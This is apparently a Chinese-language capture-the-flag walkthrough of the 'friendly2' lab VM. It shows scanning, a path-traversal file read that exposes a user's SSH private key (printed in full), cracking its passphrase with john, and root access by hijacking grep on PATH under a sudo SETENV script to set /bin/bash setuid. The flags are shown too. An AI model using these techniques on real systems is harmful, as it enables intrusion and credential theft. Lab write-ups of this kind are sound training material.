难度:easy
kali:192.168.56.104
靶机:192.168.56.178
┌──(root㉿kali2)-[~/Desktop]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:05 (Unknown: locally administered)
192.168.56.100 08:00:27:af:e6:ce PCS Systemtechnik GmbH
192.168.56.178 08:00:27:0c:8f:a4 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.919 seconds (133.40 hosts/sec). 3 responded端口扫描
┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.178 -sV -A -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 18:14 CST
Nmap scan report for 192.168.56.178
Host is up (0.00056s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 74:fd:f1:a7:47:5b:ad:8e:8a:31:02:fe:44:28:9f:d2 (RSA)
| 256 16:f0:de:51:09:ff:fc:08:a2:9a:69:a0:ad:42:a0:48 (ECDSA)
|_ 256 65:0e:ed:44:e2:3e:f0:e7:60:0c:75:93:63:95:20:56 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: Servicio de Mantenimiento de Ordenadores
|_http-server-header: Apache/2.4.56 (Debian)
MAC Address: 08:00:27:0C:8F:A4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.56 ms 192.168.56.178
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.70 seconds开启了22 80两个端口,先去web看下
没什么功能点,直接扫目录
目录扫描
┌──(root㉿kali2)-[~/Desktop]
└─# gobuster dir -u http://192.168.56.178/ -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.178/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: bak,zip,html,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 2698]
/.html (Status: 403) [Size: 279]
/tools (Status: 301) [Size: 316] [--> http://192.168.56.178/tools/]
/assets (Status: 301) [Size: 317] [--> http://192.168.56.178/assets/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1323360 / 1323366 (100.00%)
===============================================================
Finished
===============================================================直接去看tools
web信息探测+LFI
源码发现了东西
盲猜文件包含,直接尝试一手
好在功夫不负有心人,目录穿越成功LFI
尝试apache日志rce
未果
尝试读取用户ssh私钥
nice,拿到私钥就可以拿到shell了,格式有点乱,让ai整理一下
┌──(root㉿kali2)-[~/Desktop]
└─# cat aaa
-----BEGIN OPENSSH PRIVATE KEY-----
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
9tDhjVw3oagRmc3R03zfIwbPINo=
-----END OPENSSH PRIVATE KEY-----
┌──(root㉿kali2)-[~/Desktop]
└─# chmod 600 aaa
┌──(root㉿kali2)-[~/Desktop]
└─# ssh -i aaa gh0st@192.168.56.178
Enter passphrase for key 'aaa': 不过还需要密码,join爆破一下
┌──(root㉿kali2)-[~/Desktop]
└─# ssh2john aaa > bbb
┌──(root㉿kali2)-[~/Desktop]
└─# cat bbb
aaa:$sshng$6$16$bba5ea10138ccd630bebbfbd874ece13$1910$6f70656e7373682d6b65792d7631000000000a6165733235362d637472000000066263727970740000001800000010bba5ea10138ccd630bebbfbd874ece13000000100000000100000197000000077373682d727361000000030100010000018100b68b5cb38b71b940f4a54e073f11d9efae2b089b46748eae070d024344c6974388b851d2256c48263bf140d7b907cd8d4cce2e6f24570b512555705d48027cb90e1f15038b7ff8b447d04171e991626d88a750969c82d783d11c51014a8d3a38986b2cc6d6159d2ac7df1b32b3f048d0f717015c047d3c1b3a5a486eafe529b478b4f109ad0962d5f17028d035bd0139648528f6e4a8a270d9be9e66c46cb68ad54ed4fc26970c764271d21d919d489cb8f6e3ab28be7e6414f6810476e67b3f638b5d5835a1d51e01246f7edb2c99bde65ddf914eac4469f3e8996a5d89d12cdf3828016cb1039d14214aa801d43c2e1e8368bde4a54c116db55b709e9fc5050e119ef2c97ef95214cbf9ea667f1ebfc75e7849374570d16fa9f00771bef7a04181529dec708179d8aacd7139999eb87fcc1b8a6cb60e633cadf04c19006a8e8727c64212ee6b044557abcf85df5d44590cb6e0060c25716a3e7fccf645605ac1581d6a39b77cbf11813ec0b7f294b83edb9500ceb2459947c2ac7a072251af00000590348f66c2c20fbbf3a01056962e443ecf4a00dba7fc93fd215d958f37d4c7ad515947018eb43f2ebad520a4ff52c87acbd368c2c7f4c6772a6284f754788e5f7c2bd723df1c9ef403ccaf790d28813649881eedd5f3e7f47bf43248d154de9548dc98c1e82812297d9276237e7a951db59c1bca7ac97848799a1d142ea41e63559e7337cb28d4457a613a34f15cf9ba3b76e429b7523c0c73e4875514da891f87c52838c6e47ce48bad5bc1d1d01a8a4935466b50b37c79087e8d863b073a2ef10ddcdad8075624f67859bbdc684222fef94372378e2f6f394c80ea6a89b5f4ee174ab0d90fbd16eb58ccdf086c89c2c3aeea56c415204cfaaf15baf70f73ab4147cb300d5cfc56dbd6fa9340571bb1b0293032a6d99e0b8a065a77b74e6323d54e81258b2ce4b0893b7f4c7766bb3ea35ab6169138891de142d447d8819e1a8dc866d195e839d68307bf1534164f9ed334f32850d92b5b9966a3af59da38c10596b8abf78ef38f13d8594612dedf595b2ecef792b259f957e993e90608a5682325cbe437343496c05412cd1bceb84fd4270f67f75ecf0a01185bdbe5c9eb87445f8c26bd3d8a0d47e77f22e3bd37e4801e167b93e76fe077b67402774b12b857d908800b112cc18b64eaf5fad170a616769ab7bf67f4a84f8486365f2398e5dbe829dc44ba222e06157066c4309cdd118f328413f2bd7d7e1425472078c60945429d8a9902ac645e1374628734394fa353abcda76dfd1dbb5a28edae11a2631380836d06dff1cc6cb5de10cb9fcc05aaab4ea9fa5165a233ef3dabd3bcd2990e61da1e1dc58bc743911c53f1075bdbfd051549e5a7407f4e09f13940be752da85ea0c3bd9fc4397726d226747c6e39e7662c90d0056d15a0a71dee7a0b863cb0014eb72322f68d862b169739b52c66ddf47b87adaf5160d89358ebe31a6d2f0aea851c22ecbea4e6c5ce58235c831d886922c7fbb04feb42dbe1c7c807adb766db830b93ac1ddc03c6e4b8da47fec05f81f7f9ac5183bba469144572885d11ea89fa7594414c25c8ca67dda63eb0068d3fba3d18a6acaa153709a676f67e7b4f715a0848ceece6419553fd7d7cddfdaed00851af575a4e4fc88d9abce60c9f2789c27def690d1d6db9daa9c90b6332ccf2fca8ca0285c564b7042eb0d130590ea433dfab03d2dd1b7c8792b996a6b6d4853f5fe9b9f2d8b45fb368850eb0acf0c2962052cafa8a24452954d3bfbc3672a3365426af4e81a423ceb10fd6ca2d4fb1367b9235babe9ad3995287402ae38df12756d3404539247ff0437b7594ca1a2a6eadaa3c96cad3d175bec9987e9a5495b6e20b7cee5f7462b0ca006b8fa6a6d4942338712798a91c2258cc270554644fece33bacb87d3d2b1db1314c7858c90b494c9d4af7e501503b647f6ef2186fae004bfc68798662d9eee72474ad2c997b5db56b7eb1f06871540a6e4794b3e6e78e45a78aa67e64b54a76368037c6c865536a5215fac6709aba85570e478a976b4fed0ba1a836ce2ddee1a0eba12c3e2cf4b56ac6f16d0ee4568edc0585cdb91fc1ec42d8ca0914fb3b2cdda1cf7c1416db24259dcaefa069bab5effb3147a59f86ef908f79d8d8919adb7d1f32506f49f8e2ca0bd74d302bf7c66aca2a0452c46f59eecc66cb2a6434568fc73ad4b5ac19f0f0273fea3a85891d74ea49c095f7e07e5497e8546299fdb39327535b32593af9f094d66e1f03febb34cd98edca97bfc1d7767956ad9cd3c166ea7b04700f3e46ccf881f5a892c3c8034a480f5266d6ced8925a25e50afdb9a74c9b94c62d21871304b5a4a4af034644748928718df2c24c34755875d13639a58bf665b07d149dfb34564fdd36961f26878f92f298a4b122dd415fb9cb101f52b2a8b2906db91af368bebffa43d4398d7071556a06c8f6142460638738deba517d25fcb230d229c85bb09173ccf496991285714180b3de83e9afcc118e132abaf6d0e18d5c37a1a81199cdd1d37cdf2306cf20da$16$486
┌──(root㉿kali2)-[~/Desktop]
└─# john bbb
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance.
0g 0:00:00:22 17.27% 1/3 (ETA: 18:57:30) 0g/s 3.658p/s 3.658c/s 3.658C/s Aaa7
Session aborted
┌──(root㉿kali2)-[~/Desktop]
└─# john bbb --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
celtic (aaa)
1g 0:00:00:24 DONE (2024-05-27 18:56) 0.04144g/s 10.36p/s 10.36c/s 10.36C/s celtic
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 密码是celtic
getshell
┌──(root㉿kali2)-[~/Desktop]
└─# ssh -i aaa gh0st@192.168.56.178
Enter passphrase for key 'aaa':
Linux friendly2 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
gh0st@friendly2:~$ id
uid=1001(gh0st) gid=1001(gh0st) groups=1001(gh0st)gh0st@friendly2:~$ cat user*
ab0366431e2d8ff563cf34272e3d14bd
gh0st@friendly2:~$ ls -al
total 32
drwxr-xr-x 4 gh0st gh0st 4096 Apr 29 2023 .
drwxr-xr-x 3 root root 4096 Apr 27 2023 ..
lrwxrwxrwx 1 root root 9 Apr 29 2023 .bash_history -> /dev/null
-rw-r--r-- 1 gh0st gh0st 220 Mar 27 2022 .bash_logout
-rw-r--r-- 1 gh0st gh0st 3526 Mar 27 2022 .bashrc
drwxr-xr-x 3 gh0st gh0st 4096 Apr 29 2023 .local
-rw-r--r-- 1 gh0st gh0st 807 Mar 27 2022 .profile
drwx--x--x 2 gh0st gh0st 4096 Apr 29 2023 .ssh
-r--r----- 1 gh0st root 33 Apr 27 2023 user.txt拿到user flag
提权user
sudo看一手
gh0st@friendly2:~$ sudo -l
Matching Defaults entries for gh0st on friendly2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User gh0st may run the following commands on friendly2:
(ALL : ALL) SETENV: NOPASSWD: /opt/security.sh稳了
gh0st@friendly2:~$ cat /opt/security.sh
#!/bin/bash
echo "Enter the string to encode:"
read string
# Validate that the string is no longer than 20 characters
if [[ ${#string} -gt 20 ]]; then
echo "The string cannot be longer than 20 characters."
exit 1
fi
# Validate that the string does not contain special characters
if echo "$string" | grep -q '[^[:alnum:] ]'; then
echo "The string cannot contain special characters."
exit 1
fi
sus1='A-Za-z'
sus2='N-ZA-Mn-za-m'
encoded_string=$(echo "$string" | tr $sus1 $sus2)
echo "Original string: $string"
echo "Encoded string: $encoded_string"对输入的字符串进行编码,看一下权限
gh0st@friendly2:~$ ls -al /opt/security.sh
-rwxr-xr-x 1 root root 561 Apr 29 2023 /opt/security.sh不能编辑,只能从脚本本身下手,发现使用了grep,那么可以自己写个grep,让它执行我们的grep
gh0st@friendly2:~$ vi grep
gh0st@friendly2:~$ cat grep
chmod u+s /bin/bash添加环境变量
gh0st@friendly2:~$ chmod +x grep
gh0st@friendly2:~$ sudo PATH=$PWD:$PATH /opt/security.sh
Enter the string to encode:
123
The string cannot contain special characters.
gh0st@friendly2:~$ ls -al
total 36
drwxr-xr-x 4 gh0st gh0st 4096 May 27 07:08 .
drwxr-xr-x 3 root root 4096 Apr 27 2023 ..
lrwxrwxrwx 1 root root 9 Apr 29 2023 .bash_history -> /dev/null
-rw-r--r-- 1 gh0st gh0st 220 Mar 27 2022 .bash_logout
-rw-r--r-- 1 gh0st gh0st 3526 Mar 27 2022 .bashrc
-rwxr-xr-x 1 gh0st gh0st 20 May 27 07:08 grep
drwxr-xr-x 3 gh0st gh0st 4096 Apr 29 2023 .local
-rw-r--r-- 1 gh0st gh0st 807 Mar 27 2022 .profile
drwx--x--x 2 gh0st gh0st 4096 Apr 29 2023 .ssh
-r--r----- 1 gh0st root 33 Apr 27 2023 user.txt
gh0st@friendly2:~$ ls -al /bin/bash
-rwsr-xr-x 1 root root 1234376 Mar 27 2022 /bin/bash
gh0st@friendly2:~$ bash -p
bash-5.1# id
uid=1001(gh0st) gid=1001(gh0st) euid=0(root) groups=1001(gh0st)bash-5.1# cat /root/r*
Not yet! Try to find root.txt.
Hint: ...
bash-5.1# find / -name root.txt 2>/dev/null
/root/root.txt
bash-5.1# cd /root
bash-5.1# ls -al
total 28
drwx------ 3 root root 4096 Apr 29 2023 .
drwxr-xr-x 19 root root 4096 Apr 27 2023 ..
lrwxrwxrwx 1 root root 9 Apr 27 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
-r-xr-xr-x 1 root root 509 Apr 27 2023 interfaces.sh
drwxr-xr-x 3 root root 4096 Apr 8 2023 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-r-------- 1 root root 43 Apr 29 2023 root.txt不是,你flag在哪
提示是...
bash-5.1# find / -name ... 2>/dev/null
/...
bash-5.1# cd /...
bash-5.1# ls -al
total 12
d-wx------ 2 root root 4096 Apr 29 2023 .
drwxr-xr-x 19 root root 4096 Apr 27 2023 ..
-r-------- 1 root root 100 Apr 29 2023 ebbg.txt
bash-5.1# cat eb*
It's codified, look the cipher:
98199n723q0s44s6rs39r33685q8pnoq
Hint: numbers are not codified
bash-5.1# 找到flag了,但被加密了,提示数字没有被编码,那么应该就是那个编码的sh脚本,让ai帮我写个解密脚本
#!/bin/bash
echo "Enter the string to decode:"
read encoded_string
sus1='A-Za-z'
sus2='N-ZA-Mn-za-m'
decoded_string=$(echo "$encoded_string" | tr $sus2 $sus1)
echo "Encoded string: $encoded_string"
echo "Decoded string: $decoded_string"┌──(root㉿kali2)-[~/Desktop]
└─# ./aa.sh
Enter the string to decode:
98199n723q0s44s6rs39r33685q8pnoq
Encoded string: 98199n723q0s44s6rs39r33685q8pnoq
Decoded string: 98199a723d0f44f6ef39e33685d8cabd提交,正确。